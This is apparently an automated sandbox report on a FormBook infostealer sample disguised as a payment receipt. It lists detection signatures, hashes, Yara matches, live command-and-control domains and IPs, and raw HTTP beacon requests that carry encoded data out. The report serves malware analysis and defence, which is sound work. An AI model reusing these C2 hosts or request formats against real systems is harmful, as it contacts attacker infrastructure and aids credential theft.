Windows Analysis Report
payment_copy2_receipt.exe

Overview

General Information

Sample Name: payment_copy2_receipt.exe
Analysis ID: 756109
MD5: 9b8c61ded729ca6c9d5f7fded18eef27
SHA1: 37fc137e9aa09fc01820cd90c851ca3aee6be72a
SHA256: c1609447bd7a2ee528d1f2145ebc3ad9a53efee61111824d22f935e497bac31f
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Performs DNS queries to domains with low reputation
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection

Source: payment_copy2_receipt.exe ReversingLabs: Detection: 53%
Source: payment_copy2_receipt.exe Virustotal: Detection: 38%
Source: Yara match File source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: http://www.bem4u.shop/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=4D+PWXbgB4ogRjX6fs5PVj0HGmRsMlLoTFn3Q8gXNZCg8eDi41xcCT+RlNqelGXbdrjEsGoLW5hhUyw4icMG9EbpTIbOIKjETxFqhNsrxI+v Avira URL Cloud: Label: malware
Source: http://www.030332.com/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=0RH+IT1kuvDJ9rkRmbuuDnrdLgu65XozQ/JOR96kX/EhF1f6QwJsxyvJPVJiAwnUlpNMH3LUUfaqGrsuBUI8TtociOaij3z8Rf/PV9bGuXJT Avira URL Cloud: Label: malware
Source: http://www.vnsuda.lol/veh0/?V8Olq=H0phgvfvKBma6gvwGBFiiA3aGB6x1tx+qpMzsOKL6mX4XVya54sThvMqL7EFeUWxYIJWwwUJaARTNC9BUuxdalfssqJOBdyR5lth/WdqURqv&3fiPC=E4O8TXhX80iDs Avira URL Cloud: Label: malware
Source: https://www.coolfashionshop.xyz/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYV Avira URL Cloud: Label: malware
Source: http://www.stephapproved.com/veh0/?V8Olq=q2CkvjiufJAT9gG6R5hbib10Rbp6AiWeTKlSfCVYrUP+9/ZMp3UrZ4LyF/rVbhnSgdA59VnFYN1kGAwfQYzsaV6Pz6DbznSGjFMnhMTfrtcq&3fiPC=E4O8TXhX80iDs Avira URL Cloud: Label: malware
Source: http://www.coolfashionshop.xyz/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYV+IJ3Jb7LKwjIdA7aRwoOX2ozYkISvzNjnqis/EaaxX4GW2e5S3JGCYnv5+dQS5WAoQqcporDra+I+tXDBzdj1sM Avira URL Cloud: Label: malware
Source: http://www.bem4u.shop/veh0/ Avira URL Cloud: Label: malware
Source: http://www.vnsuda.lol/veh0/ Avira URL Cloud: Label: malware
Source: http://www.coolfashionshop.xyz/veh0/ Avira URL Cloud: Label: malware
Source: www.projectlis.online/veh0/ Avira URL Cloud: Label: malware
Source: http://www.stephapproved.com/veh0/ Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe ReversingLabs: Detection: 53%
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Joe Sandbox ML: detected
Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.projectlis.online/veh0/"]}
Source: payment_copy2_receipt.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Binary string: msdt.pdbGCTL source: fcvvthv.exe, 00000003.00000002.365908919.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.355203577.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.353436510.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: fcvvthv.exe, 00000001.00000003.253544929.0000000002620000.00000004.00001000.00020000.00000000.sdmp, fcvvthv.exe, 00000001.00000003.245524728.0000000002780000.00000004.00001000.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.257319352.0000000000896000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.255559001.00000000005F7000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.360183662.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.362321269.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.513574094.0000000004C2F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.362154856.000000000497D000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.512407542.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.359598987.00000000047BA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: fcvvthv.exe, fcvvthv.exe, 00000003.00000003.257319352.0000000000896000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.255559001.00000000005F7000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.360183662.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.362321269.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.513574094.0000000004C2F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.362154856.000000000497D000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.512407542.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.359598987.00000000047BA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: msdt.pdb source: fcvvthv.exe, 00000003.00000002.365908919.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.355203577.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.353436510.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00405620
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe Code function: 0_2_00405FF6 FindFirstFileA,FindClose, 0_2_00405FF6
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe Code function: 0_2_00402654 FindFirstFileA, 0_2_00402654
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_00410290 FindFirstFileExW, 1_2_00410290

Networking

Source: C:\Windows\explorer.exe Domain query: www.bem4u.shop
Source: C:\Windows\explorer.exe Domain query: www.030332.com
Source: C:\Windows\explorer.exe Domain query: www.vnsuda.lol
Source: C:\Windows\explorer.exe Domain query: www.stephapproved.com
Source: C:\Windows\explorer.exe Network Connect: 75.2.115.196 80
Source: C:\Windows\explorer.exe Network Connect: 70.32.23.81 80
Source: C:\Windows\explorer.exe Network Connect: 34.110.163.134 80
Source: C:\Windows\explorer.exe Domain query: www.coolfashionshop.xyz
Source: C:\Windows\explorer.exe Network Connect: 103.100.208.243 80
Source: C:\Windows\explorer.exe Network Connect: 2.57.90.16 80
Source: C:\Windows\explorer.exe DNS query: www.coolfashionshop.xyz
Source: Malware configuration extractor URLs: www.projectlis.online/veh0/
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: A2HOSTINGUS A2HOSTINGUS
Source: global traffic HTTP traffic detected: GET /veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=0RH+IT1kuvDJ9rkRmbuuDnrdLgu65XozQ/JOR96kX/EhF1f6QwJsxyvJPVJiAwnUlpNMH3LUUfaqGrsuBUI8TtociOaij3z8Rf/PV9bGuXJT HTTP/1.1Host: www.030332.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /veh0/?V8Olq=H0phgvfvKBma6gvwGBFiiA3aGB6x1tx+qpMzsOKL6mX4XVya54sThvMqL7EFeUWxYIJWwwUJaARTNC9BUuxdalfssqJOBdyR5lth/WdqURqv&3fiPC=E4O8TXhX80iDs HTTP/1.1Host: www.vnsuda.lolConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYV+IJ3Jb7LKwjIdA7aRwoOX2ozYkISvzNjnqis/EaaxX4GW2e5S3JGCYnv5+dQS5WAoQqcporDra+I+tXDBzdj1sM HTTP/1.1Host: www.coolfashionshop.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /veh0/?V8Olq=q2CkvjiufJAT9gG6R5hbib10Rbp6AiWeTKlSfCVYrUP+9/ZMp3UrZ4LyF/rVbhnSgdA59VnFYN1kGAwfQYzsaV6Pz6DbznSGjFMnhMTfrtcq&3fiPC=E4O8TXhX80iDs HTTP/1.1Host: www.stephapproved.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=4D+PWXbgB4ogRjX6fs5PVj0HGmRsMlLoTFn3Q8gXNZCg8eDi41xcCT+RlNqelGXbdrjEsGoLW5hhUyw4icMG9EbpTIbOIKjETxFqhNsrxI+v HTTP/1.1Host: www.bem4u.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 75.2.115.196 75.2.115.196
Source: global traffic HTTP traffic detected: POST /veh0/ HTTP/1.1Host: www.vnsuda.lolConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.vnsuda.lolUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.vnsuda.lol/veh0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 56 38 4f 6c 71 3d 4b 32 42 42 6a 5a 7a 71 4b 58 57 37 35 67 6e 36 64 57 51 6c 39 6a 32 4e 47 6b 69 45 36 63 5a 30 37 62 67 68 75 70 7e 58 75 58 6d 74 4f 46 75 5f 68 4b 63 32 75 74 38 49 53 62 49 52 53 57 33 32 4e 4f 77 45 79 31 63 4e 62 44 31 39 49 43 30 52 58 72 68 49 51 47 6e 74 6d 62 56 4d 55 2d 61 77 28 78 78 39 76 44 4e 31 55 6b 33 77 4c 67 55 61 31 75 4f 38 49 63 7e 5a 36 74 6e 46 28 6f 4f 71 42 4e 78 6c 69 61 51 72 37 72 7a 66 78 49 52 66 46 5a 4a 77 64 4b 37 67 70 52 6b 74 4b 4b 61 71 56 2d 70 7a 6f 32 74 4d 45 77 7a 64 28 37 34 41 48 76 50 48 79 6f 45 2e 00 00 00 00 00 00 00 00 Data Ascii: V8Olq=K2BBjZzqKXW75gn6dWQl9j2NGkiE6cZ07bghup~XuXmtOFu_hKc2ut8ISbIRSW32NOwEy1cNbD19IC0RXrhIQGntmbVMU-aw(xx9vDN1Uk3wLgUa1uO8Ic~Z6tnF(oOqBNxliaQr7rzfxIRfFZJwdK7gpRktKKaqV-pzo2tMEwzd(74AHvPHyoE.
Source: global traffic HTTP traffic detected: POST /veh0/ HTTP/1.1Host: www.coolfashionshop.xyzConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.coolfashionshop.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.coolfashionshop.xyz/veh0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 56 38 4f 6c 71 3d 77 31 6a 53 66 6c 50 65 73 73 61 7a 5a 66 69 68 42 6d 51 35 54 76 5a 57 33 71 4c 52 53 35 68 59 57 59 59 4f 4c 52 63 73 51 79 37 5f 6c 34 6b 79 5a 63 4f 6e 28 32 62 43 6f 4b 77 61 59 67 53 57 55 67 79 58 28 79 76 69 43 67 45 48 6f 36 47 43 47 58 5a 44 61 72 34 47 56 6f 59 72 66 49 47 58 4a 59 68 67 54 57 37 4d 68 7a 34 45 63 4f 55 69 68 6c 4d 57 65 79 71 32 76 38 30 53 45 61 57 56 4d 36 48 5f 32 65 79 48 44 63 54 37 6c 58 62 4c 51 62 47 63 56 4a 73 62 48 62 55 5f 6d 4a 7a 63 46 53 61 6e 71 4b 78 48 48 4f 4f 36 62 37 53 52 6a 72 6e 55 42 58 41 2e 00 00 00 00 00 00 00 00 Data Ascii: V8Olq=w1jSflPessazZfihBmQ5TvZW3qLRS5hYWYYOLRcsQy7_l4kyZcOn(2bCoKwaYgSWUgyX(yviCgEHo6GCGXZDar4GVoYrfIGXJYhgTW7Mhz4EcOUihlMWeyq2v80SEaWVM6H_2eyHDcT7lXbLQbGcVJsbHbU_mJzcFSanqKxHHOO6b7SRjrnUBXA.
Source: global traffic HTTP traffic detected: POST /veh0/ HTTP/1.1Host: www.stephapproved.comConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.stephapproved.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.stephapproved.com/veh0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 56 38 4f 6c 71 3d 6e 30 71 45 73 54 75 6c 54 70 55 72 39 6e 32 7a 50 65 55 67 75 34 77 6a 64 76 46 61 4e 57 6a 6f 43 35 39 65 48 58 64 6f 34 78 47 61 67 36 4e 54 71 32 55 6a 63 70 33 4d 4c 64 4b 46 5a 69 6d 54 77 34 34 37 36 31 62 32 56 70 6c 30 49 77 73 51 66 64 54 56 42 6d 4f 7a 6b 4a 79 36 71 56 47 51 6a 6a 55 41 32 61 6a 35 67 37 39 47 70 35 6d 33 62 44 43 51 79 76 38 33 50 46 7a 54 45 64 79 46 77 48 61 71 37 4b 33 36 64 6c 4f 4f 52 32 79 6c 4d 4f 4e 51 76 30 36 6e 66 32 7e 69 35 77 28 75 7a 5a 37 72 76 65 7e 5a 31 62 63 4d 52 35 61 66 49 34 62 53 30 35 4d 2e 00 00 00 00 00 00 00 00 Data Ascii: V8Olq=n0qEsTulTpUr9n2zPeUgu4wjdvFaNWjoC59eHXdo4xGag6NTq2Ujcp3MLdKFZimTw44761b2Vpl0IwsQfdTVBmOzkJy6qVGQjjUA2aj5g79Gp5m3bDCQyv83PFzTEdyFwHaq7K36dlOOR2ylMONQv06nf2~i5w(uzZ7rve~Z1bcMR5afI4bS05M.
Source: global traffic HTTP traffic detected: POST /veh0/ HTTP/1.1Host: www.bem4u.shopConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.bem4u.shopUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bem4u.shop/veh0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 56 38 4f 6c 71 3d 31 42 57 76 56 6a 72 61 46 2d 73 54 64 48 28 39 47 73 38 53 58 7a 35 54 62 53 39 65 4e 45 79 4b 4e 46 48 6b 47 62 55 6b 52 59 50 49 6a 4f 33 72 37 33 74 73 66 42 65 62 6c 5f 75 66 67 32 44 5a 4f 38 50 69 69 6a 6b 36 44 36 68 73 4f 46 4d 63 6e 2d 4a 70 32 77 62 36 61 4b 48 58 49 71 37 37 55 6d 5a 41 78 37 6b 5a 28 65 44 52 75 2d 66 2d 4b 35 4a 53 44 30 49 56 47 66 30 38 67 4e 67 33 69 31 56 4c 45 50 42 61 6c 4d 48 63 30 66 74 6a 4c 33 49 79 69 38 77 41 6a 56 42 4f 52 6c 76 65 46 78 59 41 57 52 65 75 58 79 36 62 6d 64 56 4f 65 44 44 77 4a 79 77 2e 00 00 00 00 00 00 00 00 Data Ascii: V8Olq=1BWvVjraF-sTdH(9Gs8SXz5TbS9eNEyKNFHkGbUkRYPIjO3r73tsfBebl_ufg2DZO8Piijk6D6hsOFMcn-Jp2wb6aKHXIq77UmZAx7kZ(eDRu-f-K5JSD0IVGf08gNg3i1VLEPBalMHc0ftjL3Iyi8wAjVBORlveFxYAWReuXy6bmdVOeDDwJyw.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 15:42:38 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 29 Nov 2022 15:43:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeServer: nginxVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Vp/JLII&T$dCAfAyyyr0.mx0
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 29 Nov 2022 15:43:42 GMTContent-Type: text/htmlContent-Length: 146Connection: closeServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 15:44:03 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 15:44:05 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: payment_copy2_receipt.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: payment_copy2_receipt.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: n5335GITL.12.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/fP
Source: n5335GITL.12.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: n5335GITL.12.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: n5335GITL.12.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: msdt.exe, 0000000C.00000002.514187588.000000000553A000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.coolfashionshop.xyz/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYV
Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST /veh0/ HTTP/1.1Host: www.vnsuda.lolConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.vnsuda.lolUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.vnsuda.lol/veh0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 56 38 4f 6c 71 3d 4b 32 42 42 6a 5a 7a 71 4b 58 57 37 35 67 6e 36 64 57 51 6c 39 6a 32 4e 47 6b 69 45 36 63 5a 30 37 62 67 68 75 70 7e 58 75 58 6d 74 4f 46 75 5f 68 4b 63 32 75 74 38 49 53 62 49 52 53 57 33 32 4e 4f 77 45 79 31 63 4e 62 44 31 39 49 43 30 52 58 72 68 49 51 47 6e 74 6d 62 56 4d 55 2d 61 77 28 78 78 39 76 44 4e 31 55 6b 33 77 4c 67 55 61 31 75 4f 38 49 63 7e 5a 36 74 6e 46 28 6f 4f 71 42 4e 78 6c 69 61 51 72 37 72 7a 66 78 49 52 66 46 5a 4a 77 64 4b 37 67 70 52 6b 74 4b 4b 61 71 56 2d 70 7a 6f 32 74 4d 45 77 7a 64 28 37 34 41 48 76 50 48 79 6f 45 2e 00 00 00 00 00 00 00 00 Data Ascii: V8Olq=K2BBjZzqKXW75gn6dWQl9j2NGkiE6cZ07bghup~XuXmtOFu_hKc2ut8ISbIRSW32NOwEy1cNbD19IC0RXrhIQGntmbVMU-aw(xx9vDN1Uk3wLgUa1uO8Ic~Z6tnF(oOqBNxliaQr7rzfxIRfFZJwdK7gpRktKKaqV-pzo2tMEwzd(74AHvPHyoE.
Source: unknown DNS traffic detected: queries for: www.030332.com
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_004050C0 OpenClipboard,GetClipboardData,GlobalLock,GlobalSize,VkKeyScanW,MapVirtualKeyW,GlobalUnlock,CloseClipboard, 1_2_004050C0
Source: payment_copy2_receipt.exe, 00000000.00000002.259418578.00000000006DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_00404020 GetKeyboardState, 1_2_00404020
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe Code function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405125

E-Banking Fraud

Source: Yara match File source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE
